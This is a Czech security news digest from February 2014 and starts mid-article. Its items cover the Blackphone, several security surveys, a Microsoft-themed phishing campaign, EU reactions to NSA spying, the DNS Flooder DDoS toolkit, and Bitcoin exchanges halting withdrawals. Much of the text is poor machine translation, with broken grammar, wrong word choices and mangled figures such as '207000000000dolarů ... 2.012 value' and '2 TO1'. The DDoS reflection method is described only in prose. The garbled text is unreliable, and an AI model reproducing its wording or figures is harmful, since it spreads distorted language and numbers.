Na operačním systému od Googlu bude telefon také postaven, ovšem bude používat vlastní, bezpečnější verzi nazvanou PrivatOS. Její součástí budou aplikace pro šifrované hovory, zprávy, přenos dat i video chat. Komunikační funkce budou využívat technologií od americké společnosti Silent Circle, která je známá jako tvůrce šifrovacího programu PGP. Na vývoji se pak bude podílet i výrobce telefonů se systémy Android a Firefox OS Geeksphone.
Smartphone bude vybaven 4,7palcovým displejem, 16 GB interní pamětí, 8Mpx fotoaparátem a lepším než 2GHz procesorem.
„Telefon vznikl z potřeby chránit soukromí. Geeksphone umí vyrábět telefony, Silent Circle má zase zkušenosti s ochranou soukromí. K tomu jsme přidali pár aplikací a vylepšili ochranu Androidu proti útokům,“ řekl další ze zakladatelů Phil Zimmermann.
Zabezpečenou komunikaci lze vést dvěma způsoby – mezi dvěma telefony Blackphone nebo mezi jedním Blackphonem a jiným zařízením s aplikací od Silent Circle. Vždy je přitom vyžadován šifrovací klíč, takže se k obsahu komunikaci není možné dostat ani z vlastních serverů společnosti.
„Neříkáme vám, abyste nám věřili. Představte si například, že by naše servery padly do nesprávných rukou,“ řekl Zimmermann. I kdyby je prý získala samotná NSA, byly by jí k ničemu.
Autoři věří, že lidé budou mít o nový typ telefonu zájem. Ostatně, i díky případu Edwarda Snowdena prý Silent Circle zaznamenal zvýšený zájem o své služby. Společnost nepopírá, že se aféra příznivě podepsala na jejích tržbách.
Telefon bude prodávat jeho výrobce i mobilní operátoři. Zatím se však oficiálně ví pouze o KPN Mobile v Nizozemsku.
Smutný stav kybernetické bezpečnosti připravenosti
24.2.2014 Bezpečnost
Jen 17 procent britských podnikatelů viz kybernetickou bezpečnost jako hlavní prioritu, ve srovnání s 41 procenty v USA, výzkum z BT odhalil. výzkum, který posuzuje postoje ke kybernetické bezpečnosti a úrovně připravenosti mezi IT s rozhodovací pravomocí, zdůrazňuje že britské podniky zaostávají za svými protějšky v USA v klíčových oblastech. Jen jeden z pěti (21 procent) respondentů ve Velké Británii jsou schopny měřit návratnost investic do jejich počítačové bezpečnostních opatření ve srovnání s devíti z deseti (90 procent) společností v USA. Podobně 86 procent amerických ředitelů a vedoucích s rozhodovací pravomocí jsou uvedeny zabezpečení IT školení ve srovnání s pouze 37 procent ve Velké Británii.
Respondenti, že věří, postoj jejich generálního ředitele k kybernetické bezpečnosti je "ochrana proti kybernetickému útoku je absolutní prioritou" podle zemí (BASE: všichni respondenti) Více než polovina (58 procent), kteří rozhodují IT celosvětově uvedl, že jejich desky podceňují význam o kybernetické bezpečnosti. Tento údaj se zvyšuje na 74 procent v USA, ale klesne na 55 procent ve Velké Británii. rozdíl v úrovni připravenosti koreluje s postoji k hrozbám. Non-škodlivé zasvěcených hrozby (např. náhodné ztrátě dat), jsou v současné době nejčastěji citovaný bezpečnostním problémem na celém světě byla hlášena jako vážná hrozba o 65 procent tvůrců IT rozhodování. Ve Velké Británii to klesne na 60 procent a následně se zlými úmysly zasvěcených hrozbami (51 procent), hacktivism (37 procent), organizovaný zločin (32 procent), národních států (15 procent) a terorismus (12 procent) . Ve Spojených státech je podíl osob s rozhodovací pravomocí IT, kteří vidí non-škodlivé zasvěcených hrozby jako vážnou hrozbu zvyšuje na 85 procent a následně se zlými úmysly zasvěcených hrozbami (79 procent), hacktivism (77 procent), organizovaný zločin (75 procent), terorismus (72 procent) a národní státy (70 procent). Do budoucna, více než polovina světových tvůrců rozhodnutí, které se domnívají, že hacktivism (54 procent) a škodlivý zasvěcených hrozby (53 procent), budou představovat větší riziko v průběhu příštích 12 měsíců. V USA se zvýší na 73 procent a 74 procent, resp. Pro srovnání, 29 procent a 23 procent ve Velké Británii. Globálně, terorismus je vnímán jako hrozba nejméně pravděpodobné, že představují větší riziko v průběhu příštích 12 měsíců. Cyber bezpečnostní hrozby, které představují riziko nyní a které představují větší riziko, v příštím roce (Base: Všichni respondenti) Mark Hughes, výkonný ředitel společnosti BT bezpečnosti, řekl: "Tento výzkum poskytuje fascinující pohled na měnící se hrozeb a výzvu To představuje pro organizace po celém světě. Masivní expanze vlastnictví zaměstnanců zařízení, cloud computing a extranety, se násobí riziko zneužívání a útoku, takže organizace vystavené nesčetných vnitřních a vnějších hrozeb -. Škodlivých a náhodných "Americké firmy by měl být slaven za uvedení kybernetické bezpečnosti na přední noha. Rizika pro podnikání se pohybují příliš rychle, čistě reaktivní zabezpečení přístupu, aby byla úspěšná. Stejně tak by se kybernetické bezpečnosti být viděn jako problém pro IT oddělení sám. " V reakci na nové hrozby, tři čtvrtiny (75 procent), tvůrců IT rozhodování na celém světě říkají, že by chtěli přepracovat svou infrastrukturu a navrhnout jim s bezpečnostními prvky z zem se. 74 procent by chtěl trénovat všechny zaměstnance v počítačové bezpečnosti osvědčených postupů. Podobně, jen něco málo přes polovinu (54 procent) uvedla, že by se chtěli zapojit externí dodavatele pro monitorování systému a zabránit útokům. Hughes dodal: "Vzhledem k tomu, hrozeb se neustále vyvíjí, generální ředitelé a vedoucí pracovníci na úrovni desky je třeba investovat do kybernetické bezpečnosti a vzdělávat své lidi v IT oddělení i mimo něj. V sázce je příliš vysoká pro kybernetickou bezpečnost, aby se tlačil na dně hromady.
Neskutečná Microsoft "aktivovat e-mailového účtu", e-maily, dělá kola
24.2.2014 Phishing
Phishingové e-maily údajně poslal Microsoft se zaměřují na zákazníky, společnosti a snaží se je přimět, aby odhalit své přihlašovací údaje a některé osobní informace. vzhledem k záminkou, že je třeba, aby reaktivní svůj e-mailový účet. "V souladu s aktualizací pokynů na e-mail od společnosti Microsoft Corporation a WWW hostitel poštovní doména, všechny neověřené e-mailové účty by se pozastavuje pro ověření, "e-mailové pohledávek. "Aby nedošlo k pozastavení vašeho e-mailového účtu a také zachovat všechny e-mailové obsah, proveďte jeden čas automatické ověření vyplněním on-line formuláře ověřování." "Prosím, přesunout zprávu do složky Doručená pošta, je-li nalezen v hromadném adresáři. Prosím tě, to pro všechny vaše e-mailové účty, "že phishery přidány v naději na získání více než jednu sadu pověření e-mailového účtu, pak podepsal e-mail s" WWW. mailovou podpůrný tým "," Microsoft Corporation ". Příjemci, kteří následují vložený odkaz, jsou prezentovány s on-line formulář, který od nich vyžaduje zadat svou e-mailovou adresu, heslo, datum narození a telefonní číslo. "Po předání těchto informací, jsou uživatelé automaticky přesměrováni pryč z webových stránek podvod. Mezitím, mohou podvodníci využít data, která mají ukradené na přístup k ohrožena e-mailové účty a používat je, aby zahájily další spam a podvodné kampaně, " vysvětluje Hoax-Slayer. "Vzhledem k tomu, podvod e-maily jsou odesílány prostřednictvím unesených účtů obětí, e-maily nelze vystopovat zpět do zločinců zodpovědných."
NSA snooping: návrhy EP tabulky na ochranu soukromí občanů EU
24.2.2014 Špionáž
Evropský parlament by měl odepřít svůj souhlas k obchodní dohodě mezi EU a USA, pokud plně respektuje datový soukromí občanů EU, říká zpráva poptávku na NSA a členské státy EU sledování občanů EU, schválen Výborem pro občanské svobody ve středu. Dodává, že pravidla pro ochranu údajů by měly být vyloučeny z obchodních jednání a sjednat samostatně s USA.
Text, schválil 33 hlasy pro, 7 členů se zdrželo hlasování s 17, odsuzuje "rozsáhlé, systematické, plošné shromažďování osobních údajů o nevinných lidí, často zahrnující intimní osobní údaje" a dodal, že "boj proti terorismu nemůže být nikdy důvodem pro necílené , tajné nebo dokonce nelegálních programů hmotnost dozoru ". "Nyní máme komplexní text, který poprvé spojuje in-hloubkové doporučení týkající se tvrzení Edwarda Snowdena ze dne NSA špionáže a akční plán pro budoucnost. Zpráva Výbor pro občanské svobody přišel na rozhodující čas, spolu s obviněními Snowdena a nařízení EU o ochraně údajů. Doufám, že tento dokument bude podpořena plnou parlamentu a Rady, že bude trvat déle než do příštího mandátu Evropského parlamentu ", řekl zpravodaj Claude Moraes (S & D, UK ), po hlasování. musí být zajištěna ochrana údajů vyloučeny z obchodních jednání souhlas Parlamentu k závěrečné transatlantického obchodu a investic partnerství (TTIP) dohodu s USA "by mohl být ohrožen, pokud činnosti deka hmotnost dozoru a odposlech komunikace v institucích EU a diplomatická zastoupení, nejsou zcela zastavena a adekvátní řešení pro práva na ochranu osobních údajů občanů EU, včetně správní a soudní nápravy nebyl nalezen ", poslanci říkají. Evropský parlament by proto měl odepřít svůj souhlas s dohodou o TTIP, pokud plně respektuje základní práva zakotvená v Charta EU, text doplňuje, zdůrazňuje, že ochrana údajů by měla být vyloučena z obchodních jednání. Poslanci vyzývají k "okamžitému pozastavení" zásad bezpečného přístavu ochrany osobních údajů (dobrovolné normy pro ochranu údajů pro firmy ze zemí mimo EU se převádějí občanů EU "osobní údaje do USA). Tyto zásady "neposkytují dostatečnou ochranu pro občany EU," tvrdí poslanci, které přiměly USA, aby navrhla nová pravidla pro předávání osobních údajů, které splňují požadavky EU na ochranu údajů. Programu sledování financování terorismu (TFTP) dohoda by měla být pozastavena, dokud tvrzení, že USA orgány mají přístup do bankovních údajů občanů EU mimo dohody jsou objasněny, říkají poslanci. Rámec ochrany údajů dohoda mezi EU a USA, aby byl udeřen na jaře roku 2014, musí zajistit řádné soudní nápravy pro občany EU, jejichž osobní údaje jsou předávány do USA, oni přidají. Digitální "novou dohodu" EU potřebuje "digitální novou dohodu", na být doručeny do společného úsilí institucí EU, členských států, výzkumnými institucemi, průmyslem a občanskou společností, tvrdí poslanci s tím, že některé telecoms firmy jasně zanedbané bezpečnosti IT a jejich uživatelů a klientů. Poslanci rovněž naléhá na členské státy, aby urychlily práci o návrhu reformy právních předpisů na ochranu dat v EU tak, aby mohl být schválen do konce letošního roku. Důvěra v USA cloud computing a cloud poskytovatelů byl poškozen praktikami dozoru, poslanci na vědomí. Navrhují, že Evropa by měla rozvíjet své vlastní mraky a IT řešení s cílem zajistit vysokou úroveň ochrany osobních údajů. Berou na vědomí, že do roku 2016, cloud trhu je pravděpodobné, že by stálo za 207000000000dolarů ročně dvojnásobek 2.012 value. informátor EU a ochrana nosičů programu Usnesení vyzývá Evropskou komisi, aby prověřila, zda budoucí právní předpisy EU o zřízení "evropského program na ochranu informátor "by měl zahrnovat i další oblasti pravomocí EU", se zvláštním důrazem na složitosti whistleblowing v oblasti inteligence ". Členské státy EU jsou rovněž požádáni, aby zvážili udělení informátorů mezinárodní ochranu, stíhání. Poslanci také citují zadržení ve Velké Británii Davida Miranda a zabavení materiálu v jeho vlastnictví podle zákona Spojeného království terorismu a jeho požadavku, aby Guardian noviny předání nebo zničení takového materiálu. Vidí tyto akty jako "možný vážný zásah do práva na svobodu projevu a svobodu sdělovacích prostředků", jak bylo uznáno Evropskou úmluvou o lidských právech a Listiny základních práv EU. Země EU by měly kontrolovat své vlastní tajné služby, Velká Británie, Francie, Německo, Švédsko, Nizozemsko a Polsko by mělo objasnit tvrzení o hromadný dozor - včetně případných dohod mezi zpravodajskými službami a telekomunikačních firem na přístup k výměně osobních údajů a přístup k transatlantických kabelů - a jejich soulad s právními předpisy EU, říká. Ostatní země EU , zejména těch, které se podílejí na "9-oči" (Velká Británie, Dánsko, Francie a Nizozemsko) a "14-oči" opatření (tyto země a Německo, Belgie, Itálie, Španělsko a Švédsko) se rovněž vyzývají, aby přezkoumaly své vnitrostátní zákony a postupy, kterými se řídí činnost zpravodajských služeb, aby bylo zajištěno, že jsou předmětem parlamentní a soudní dohled a veřejné kontrole a že jsou v souladu se závazky v oblasti základních práv. Poslanci považují za dvoustranné dohody, "anti-špionážní" uzavřené nebo v rámci jednání mezi některými zemí EU (Velká Británie, Francie a Německo) a USA je "kontraproduktivní a irelevantní, vzhledem k potřebě evropského přístupu k tomuto problému".
Nová globální partnerství pro boj proti počítačové kriminalitě
24.2.2014 Kriminalita
Microsoft oznámil tři nové globální partnerství s Organizací amerických států, Europolu a FIS na zvýšení spolupráce mezi mezinárodním vymáhání práva a soukromého sektoru v boji proti počítačové trestné činnosti a pomoc při budování bezpečnějšího internetu.
Microsoft úředníci podepsali memoranda o porozumění s představiteli všech tří organizací v průběhu prvního ročníku Počítačová kriminalita prosazování summitu společnosti, která svedla dohromady více než 60 představitelů a odborníků z oblasti vymáhání práva, akademické obce a soukromého sektoru pro sdílení právních a technických řešení, čelit celosvětové šíření o počítačové trestné činnosti. Konference navazuje na otevření loni na podzim z Microsoft kyberkriminalitě Center, state-of-the-art zařízení určené speciálně pro pokrok v celosvětovém boji proti počítačové kriminalitě. Tyto dohody stanoví rámec pro spolupráci a jsou určeny k zintenzivnění spolupráce a pomoci Microsoft pracují s každý ze tří organizací, k výkonu trestní podniky zabývající se počítačovou kriminalitou. Microsoft, OAS, Europol a FIS předpokládat, že spolupráce jim umožní posílit jejich soudní a technickou analýzu malware a botnetů, hodnocení a zkoumání vznikajících malware hrozby; vynucovací opatření proti zločinci,., A konečný demontáž těchto zločinných spolčení " Počítačoví zločinci jsou stále více sofistikovanější v lovení na spotřebitele, včetně dětí a starších občanů, "řekl Brad Smith, Microsoft výkonný viceprezident a generální rada. "Tyto dohody budou pomáhat soukromým a veřejným sektorem v boji proti počítačové trestné činnosti efektivněji, a zároveň chránit soukromí našich zákazníků." Microsoft je nadšený označit jeho první spolupráci s Organizací amerických států. OAS byla založena zčásti na posílení spolupráce mezi jejími členskými státy, která v současné době zahrnuje všech 34 nezávislých států Ameriky. OAS je odhodlána rozvíjet kulturu kybernetické bezpečnosti tím, že účinné a preventivní opatření k předvídání, adresu a reagovat na kybernetickým útokům. "Neexistují žádné hranice, pokud jde o počítačové trestné činnosti a zločinci jsou umístěny po celém světě, takže je nemožné, aby někdo organizace v boji proti počítačové kriminalitě sám, "řekl OAS velvyslanec Adam Blackwell. "Musíme využít sílu partnerství mít větší vliv proti těmto zločincům a udržet internet bezpečnější pro všechny." Microsoft často spolupracuje s orgány činnými v trestním organizacemi. Jedním z příkladů je nedávná spolupráce s Europolem, aby se úspěšně narušit nebezpečné ZeroAccess botnet, který infikovaný až 2 miliony počítačů a ukradl miliony dolarů z on-line inzerentů. Europol, který se může pochlubit svou vlastní Evropská Počítačová kriminalita Centre (EC3) se sídlem v centrále Europolu v Haagu, Nizozemsko, podporuje celou řadu významných počítačové kriminality operace zahrnující škodlivého softwaru a online zneužívání dětí. Dnešní dohoda se zpevní závazek Europolu nadále poskytovat cílené a účinné přístupy k boji proti počítačové trestné činnosti v Evropě. "ZeroAccess narušení botnet demonstroval sílu našich společných snah, jak náš koordinovaný přístup nuceni se zločinci v tomto případě odejít od svého zločinného podniku," řekl Zástupce ředitele Troels Oerting Europolu, který má na starosti EC3. "Tento druh spolupráce je nový model potřeboval k útoku proti počítačové trestné činnosti, a to je důvod, proč jsme odhodláni spolupracovat s Microsoftem, takže můžeme mít více agresivní akce v budoucnu." Finanční zločiny, zejména představovat vážnou hrozbu kybernetické. Jako největší světový poskytovatel finančních technologií, FIS je v přední linii boje udržet kybernetické bezpečnosti plateb a finančních transakcí po celém světě. Podpisem tohoto memoranda o porozumění, FIS je další krok na účet svých klientů finančních institucí, které pomáhají chránit je proti počítačové trestné činnosti. "Toto partnerství se společností Microsoft vám pomůže FIS lépe chránit své zákazníky před počítačovou kriminalitou a aby globální finanční transakce bezpečnější pro naše klienty a jejich Zákazníci, "řekl Greg Montana, EVP a ředitel pro řízení rizik, FIS. "Jsme potěšeni, že ve spolupráci s firmami jako Microsoft, které užíváte agresivní kroky k řešení počítačové kriminalitě při každé příležitosti. Těšíme se na dlouhodobou a oboustranně prospěšného vztahu se společností Microsoft."
Obavy o bezpečnost brzdí konsolidaci datových center
22.2.2014 Bezpečnost
Bezpečnostní obavy brání podnikům z odemykání potenciální přínosy konsolidace datových center a cloud služeb, podle SafeNet.
Výzkum, který je založen na globálním průzkumu cca 600 bezpečnosti a manažery IT, zjistil, že zatímco téměř tři čtvrtiny odborníků v oblasti IT zobrazení konsolidace datového centra jako důležité (75 procent EMEA, 73 procent Noram, 63 procent APAC), více než polovina (51 procent) nemají konsolidační plány v místě (46 procent EMEA, 49 procent NORAM, 71 procent APAC)., a pouze čtvrtina dokončení konsolidační projekty Výsledky průzkumu ukazují, že bezpečnostní problémy, pokud jde o adresování šifrování a klíčových potřeb v oblasti řízení , mohou být faktory přispívající ke zpomalení pokroku v úsilí o konsolidaci, včetně pohybující se zátěží od fyzických strojů do virtualizovaných systémů. Konkrétně, na ty, kdo konsolidace datového centra tak důležité, 62 procent uvedlo, že jejich největší starostí bylo, že ztratí kontrolu kryptografických klíčů (68 procent EMEA, 65 procent NORAM, 59 procent APAC). Tento sentiment naznačuje, že silné šifrování a bezpečnou správu klíčů jsou rozhodujícími předpoklady pro konsolidaci datových center a cloud migraci. Ve skutečnosti, pouze jedna pětina (21 procent) respondentů uvedlo, že jsou v současné době dělá jakékoliv šifrování ve svých virtuálních prostředí (23 procent EMEA, 22 procent NORAM, 16 procent APAC). Stejně jako šifrování a správu šifrovacích klíčů technicky náročné pro IT profesionály, tyto výsledky průzkumu také vyplývá, že podniky nemají požadované úrovně personální v místě na podporu konsolidace projektu. Téměř 60 procent respondentů uvedlo, že mají méně než pět lidí zapojených v řízení šifrování na celém světě. Navíc, téměř jedna třetina (27,5 procent) uvedlo, že více než 10 obchodních aplikací, které vyžadovaly šifrování. "přijetí nových technologií-takové jako velké dat, mobilita a cloud-based služeb, se tlačil konsolidace datového centra na horní části seznamu priorit pro mnoho firem. Přesto je zřejmé, že obavy o bezpečnost v kombinaci s nedostatkem zdrojů narušuje průběh takových transformací, "uvedl Prakash Panjwani, senior viceprezident a generální manažer, SafeNet. "Každý posun do infrastruktury může být skličující pro IT profesionály, ale s daty nyní uložen přes hybridní IT krajiny, včetně on-prostor, na mobilních zařízeních, a v cloud-bezpečnostních týmů provede odklon od tradičních přístupů a přijmout nové šifrovací technologie, které podporují dnešní dynamická datová centra a poskytovatele služeb prostředí, "pan . Panjwani pokračoval Hledáte konkrétně v běžných bezpečnostních procesů pro správu šifrovacích klíčů, výzkum ukázal, že:
Téměř tři čtvrtiny (74 procent) mají alespoň několik šifrovacích klíčů v softwaru (74 procent EMEA, 76 procent Noram, 69 procent APAC) - nechat otevřené dveře pro útočníky.
Méně než jeden z deseti (8,3 procenta) zabezpečit své klíče pouze v hardwaru (8 procent EMEA, 7 procent Noram, 14 procent APAC).
Jen za jedna pětina (18 procent), nevěděl, kde byly jejich klíče uloženy (17 procent EMEA, 16 procent NORAM, 17 procent APAC).
Méně než polovina respondentů (45,6 procenta), správu šifrovacích klíčů centrálně (41 procent EMEA, 43 procent NORAM, 45 procent APAC). To vytváří půdu pro neúčinnosti, překrývání úsilí, vymáhání nekonzistentní politiky a obtíže při auditu.
Microsoft představuje Multifaktorová autentizace pro všechny společnosti 365 uživatelů
22.2.2014 Bezpečnost
V chvályhodné pohybu, Microsoft rozšířil možnost ověřování multifaktoriální pro všechny uživatele sady Office 365, svého oblíbeného bázi předplatného online kancelářský software suite. "Dnes budeme přidávat Multi-faktor autentizace pro Office 365 pro služby Office 365 pro středně velké firmy, podniku plány , Akademické plány, Neziskové plány, a samostatné společnosti 365 plány, včetně systému Exchange Online a SharePoint Online, " oznámil Paul Andrew, technický produktový manažer pro Office 365.
"S Multi-faktor autentizace pro služby Office 365, jsou uživatelé povinni přiznat telefonát, textovou zprávu nebo oznámení o aplikaci na svém smartphonu po správném zadání svého hesla. Teprve poté, co byla splněna tato druhá ověřování faktor může uživatel přihlásit, "vysvětlil. Office 365 mohou administrátoři vynutit svým uživatelům používat ověřování multi-faktor velmi snadno. Poté, co jsou zapsáni, budou muset nakonfigurovat svůj druhý faktor autentizace na svém příštím přihlášení. Microsoft také má rovněž v úmyslu zavést App hesla Office desktopových aplikací, dodatečně chránit Office klienta (desktop) aplikace s 16-znaku náhodně generované heslo. "Plánujeme přidat nativní ověřování multi-faktor pro aplikace, jako je Outlook, Lync, Word, Excel, PowerPoint, PowerShell, a OneDrive pro podnikání, s datem vydání je plánováno na později v roce 2014," také přidal se. "Tato aktualizace obsahuje aktuální ověřování multi-faktor telefon-založené, a přidává schopnost integrovat jiné formy ověřování, jako jsou:. multi-faktor autentizace řešení třetích stran a čipových karet Podpora čipových karet se plánuje zahrnout US Department of Defense (DoD) Common Access Card (CAC) a US Federal Osobní Ověření identity card (PIV), mezi ostatními.
DDoS útok nástrojů zjednodušuje spuštění velkých reflexe útoků
22.2.2014 Počítačový útok
Prolexic Technologies vydala vysoké pohotovosti DDoS útok hrozeb poradenství na DNS Flooder v1.1 toolkit. Toolkit umožňuje rychlejší a jednodušší pro zlomyslné herci zahájit ochromující reflexe útoků a bude pravděpodobně široce přijata na trhu DDoS-as-a-Service, případně zvýšení počtu útoků.
Tato nová sada nástrojů umožňuje škodlivé činitele na nákup, nastavit a používat své vlastní DNS servery, aby zahájily odraz útoky bez nutnosti najít otevřené a zranitelné DNS servery na internetu. To urychluje dostupnost DNS botnet, což škodlivé činitele, aby zahájily rozsáhlé kybernetické útoky, aniž by museli trávit značné množství času a zdrojů, budování armády botů přes malware infekce. "Jako DNS Flooder toolkit používá odraz a zesílení techniky, mohou útočníci anonymně spustit výkonné DDoS útoky s jen několik serverů, "řekl Stuart Scholly, prezident Prolexic. "Široké využití na trhu DDoS-as-a-Service je pravděpodobné a bezpečnostní komunita si musí být vědom a pozorně sleduje vznikající hrozby." Prolexic zaznamenala DNS Flooder toolkitu v několika DDoS útok kampaní proti své globální základnu klienta přes Posledních šest měsíců. V některých případech, kampaně měli zesílení faktory 50 násobku šířky pásma původu. DNS Flooder toolkit používá proces multi-krok zahájit DDoS útoky:
Toolkit spoofs IP adresu zamýšleného cíle a vytvoří žádost o DNS, který je zaslán na útočníkův DNS botnet.
Útočníka DNS botnet vysílá rozšířený DNS (EDNS) odpověď zpět. Reakce EDNS obsahuje více dat, než žádost o DNS (zesílení). Vzhledem k tomu, IP adresa, v žádosti bylo falešné, odpověď se odrazí zpět k cíli útočníka.
Toolkit smyčky vícekrát, což odráží a zesiluje odpověď na cíl po každém cyklu.
Použití šifrování stále roste
22.2.2014 Šifrování
Použití šifrování i nadále růst v reakci na obavy spotřebitelů, předpisy ochrany osobních údajů shodě a na-děje kybernetickým útokům, a přesto stále existují velké problémy v provádění šifrování dat politiky, podle studie Ponemon Institute.
Klíčová zjištění:
Stálý nárůst v nasazení šifrování s 35% organizací s podnikovou široký šifrování strategii
Většina organizací nasadit šifrování pro zmírnění dopadu narušení dat
Číslo jedna vnímaná hrozba k citlivým údajům je zaměstnanec chyby a nikoli útokem zvenčí
Dva největší výzvy, kterým čelí organizace, které vykonávají šifrování dat politiky se neví, kde citlivá data uložena a řízení skutečnou technologii
Správa klíčů identifikován jako hlavní problém více než polovina organizací
Organizace s nejvyšším bezpečnostním pozici jsou nyní třikrát větší pravděpodobnost, že mají formální strategii šifrování než ty s nejnižším bezpečnostní pozici.
Výsledky studie ukazují, že byl trvalý růst v nasazení šifrovacích řešení používaných organizacemi za posledních devět let, s 35% organizací má nyní šifrovací strategie důsledně uplatňována v celém podniku ve srovnání s 29% v loňském roce. Průzkum také ukázal, že pouze 14% dotazovaných organizací nemají šifrování strategie ve srovnání s 22% v loňském roce. Poprvé primární ovladač pro nasazení šifrování ve většině organizací je snížit dopad narušení dat, zatímco v předchozích letech Hlavním problémem bylo chránit značku nebo pověst organizace. Z těch organizací, které se domnívají, že mají povinnost zveřejňovat údaje porušování téměř polovina domnívat, že šifrování dat zajišťuje jejich bezpečný přístav, který nevyžaduje nutnost zveřejnit, že došlo skutečně k porušení. Nejrychleji rostoucí důvod, proč organizace nasazování šifrování je, aby bylo zajištěno, že splní své závazky na soukromí svých zákazníků se na zájmy svých zákazníků 42% organizací se zaměřuje spíše než pro jejich vlastní prospěch, který se zvýšil o 5% ve srovnání s loňským rokem . Číslo jedna vnímaná hrozba pro vystavení citlivých nebo důvěrných dat zůstává zaměstnanců chyby, podle 27% respondentů. Jsou-li zaměstnanec chyby v kombinaci s náhodným systém nebo proces poruch, obavy z nechtěného vystavení převažují obavy skutečných škodlivými útoky o více než 2 TO1. Kromě toho, nucené zveřejnění spouštěné žádosti e-discovery nyní představují druhý nejvyšší vnímanou hrozbu ke ztrátě citlivých dat. Když se ptali, kde je použito šifrování, organizace zařadil záložní pásky a databází, jako nejdůležitější následuje šifrování v síti a šifrování notebooku. Cloud šifrování měla relativně nízké hodnocení ve srovnání s jinými případy použití šifrování pořadí u vrcholu 10. Dva největší výzvy, kterým čelí organizace, provádění šifrování dat politiky byly objevování, kde citlivá data skutečně bydlí, uvádí 61% respondentů, a schopnost nasazení šifrovací technologie efektivně, uvádí 50% respondentů. Správa klíčů byl identifikován jako hlavní problém s více než polovina dotazovaných organizací hodnocení celkové výzvy spojené se správou klíčů nebo certifikátů na více než 7 na stupnici od 1 do 10 (10 je nejvyšší) a 30% organizací hodnotili výzvu na 9 nebo 10. Zatímco tři čtvrtiny organizací identifikovány správu klíčů jako formální disciplíny v rámci své organizace, více než 70% z těchto organizací se nepodařilo alokovat specializované pracovníky nebo nástroje pro úkol řízení tlačítky. Standardní Key Management Interoperability Protocol (KMIP), který umožňuje organizacím nasadit centralizované systémy správy šifrovacích klíčů, které trvají více případů užití a zařízení dodavatele, již vytvořila poměrně vysokou úroveň informovanosti mezi IT a bezpečnostní odborníci v oblasti IT. KMIP je vnímán být rostoucí význam a očekává se, že přispěje k šifrování a klíčových strategií řízení specificky kolem mraků, skladování a šifrování na úrovni aplikace. Více než polovina dotázaných uvedla, že standardní KMIP bylo důležité v cloudu šifrování ve srovnání s 42% v loňském roce. Technické bezpečnostní moduly (HSM), jsou stále považovány za důležitou součást klíčové strategie řízení. . Tato zařízení se používají k ochraně kritické zpracování údajů a klíče vysoké hodnoty a mohou být použity pro silně prosazovat bezpečnostní politikách a řízení přístupu Richard Formy, viceprezident pro strategii v Thales e-Security říká: "I když klíč řízení může být vznikající jako bariéra k šifrování nasazení, to není nový problém. Problémy spojené se správou klíčů již byly řešeny v silně regulovaných odvětvích, jako je zpracování plateb, kde se osvědčené postupy jsou dobře osvědčený a snadno se může převést do různých jiných vertikál. S více než 40 let zkušeností poskytuje klíčové řešení pro správu. Thales je ideálně umístěn na pomoc organizacím znovu posoudit a přehodnotit jejich bezpečnostní šifrovací klíč a správu infrastruktury a dodávat řešení, která zajistí jejich integritu a důvěryhodnost. " Více než 4.800 podnikání a IT manažeři byly zjišťovány v USA, Velké Británii, Německu, Francii , Austrálie, Japonsko, Brazílie a poprvé v letošním roce Rusko, zkoumat globální šifrování trendy a regionální rozdíly v použití šifrování. Výsledky z Ruské průzkumu ukázaly, přijetí šifrování v regionu je velmi hodně v souladu se zbytkem zkoumaných zemí.
Hit s DoS, několik výměn Bitcoin pozastavit výběry
22.2.2014 Bezpečnost
Jako populární Bitcoin výměny nadále bombardováni s chybně transakcí, mnoho z nich se rozhodlo dočasně zabránit svým zákazníkům stáhnout své finanční prostředky. Problém, zpočátku myslel být omezena pouze k výměně Japonsko založené na Mt. GOX, leží v vady postihující Bitcoin peněženky, ale ne Bitcoin kniha. Jako několik dalších výměn - nejvíce prominentně Bitstamp a BTC - také zastavit nebo zpoždění výběry, dokud není problém vyřešen, kurz Bitcoin vzal ostrý skok. The Bitcoin Nadace se přestěhoval do uklidnit uživatele a vysvětlit situaci:
Někdo (nebo několik somebodies) se využívají vydání transakce tvárnost a předávání zmutované verze transakcí. Toto je odhalení chyby jak v referenční implementace a software Některé burzy. My (jádro dev team, vývojáři na burzách, a dokonce i velkých těžebních bazény) vytváření zástupná řešení a opravy právě teď. To je útok typu denial-of-service, kdo je na tom to není krádež mince, ale daří v prevenci některé transakce z potvrzení. Je důležité si uvědomit, že DoS útoky nemají vliv na Bitcoin peněženky nebo prostředky lidí. Uživatelé referenční implementace, které jsou pokousal této chybě může vidět jejich bitcoins "svázaná" v nepotvrzených transakcí, musíme aktualizovat software stanovit, že chyba, takže když upgradu ty mince jsou vráceny do peněženky, a jsou k dispozici opět utrácet. Pouze uživatelé, kteří dělají více transakcí v krátké době bude ovlivněn. Výsledkem je, že výměny jsou o dočasném pozastavení výběry na ochranu finančních prostředků zákazníků a zabránit finanční prostředky od bytí nemístné.
Mt. GOX také oznámila , že spolupracuje s vývojovým týmem Bitcoin na řešení. Dosud není známo, kdo za útoky stojí, ale je rozumné věřit, že útoky jsou koordinovány a že konečným cílem útočníků bylo dočasně přinést cena Bitcoin dolů, aby bylo možné na trhu spekulace. Nebylo by to poprvé, kdy DDoS útoky jsou používány k ovlivňování finančních trhů.
HP uvádí bezpečnosti a zabezpečení serveru aktualizace bude i nadále zdarma
22.2.2014 Bezpečnost
Zprávy , které začíná 19. února, bude HP poskytovat aktualizace firmwaru pro své servery pouze pro zákazníky s platnou zárukou, Care Pack nebo smlouvy o poskytování podpory, která zasáhla jako domečky z karet těm, kteří nemají a nemají v úmyslu platit pro službu. "Toto rozhodnutí posiluje náš cíl poskytnout přístup k nejnovějším firmware HP, která je cenným duševním vlastnictvím, pro naše zákazníky, kteří si zvolili maximalizovat a chránit jejich investice do IT.," vysvětlila Marie McCoy, VP pro podporu serveru. "Víme, že je to změna od toho, jak jsme udělali podnikání v minulosti. To však vyrovnává s průmyslovými osvědčených postupů, a je to správné rozhodnutí pro naše zákazníky a partnery" Uživatelé, kteří nemají nebo nechtějí platit za přístup k firmware cítil kouta - jestliže kritická chyba je objevena ve firmwaru a záplatované, oni by byli nuceni pony se peníze, nebo být vystaveny zvýšenému riziku. ale McCoy vyjasnilo pár detailů v úterý, a potvrdil, že aktualizace zabezpečení a bezpečnosti bude i nadále poskytována zdarma všem uživatelům serveru. "Je to díky prodeji záruky na produkt a prodeje podpůrných služeb po záruce, že jsme schopni investovat do vytvoření velké zkušenosti zákazníků s našimi výrobky. Samozřejmě se neptejte zákazníky, aby kupovali podporu, je to jejich volba, "řekla vysvětlila . "Změní přístupová firmware jsme udělali na 19 únoru 2014 se vztahují na serverech HP ProLiant 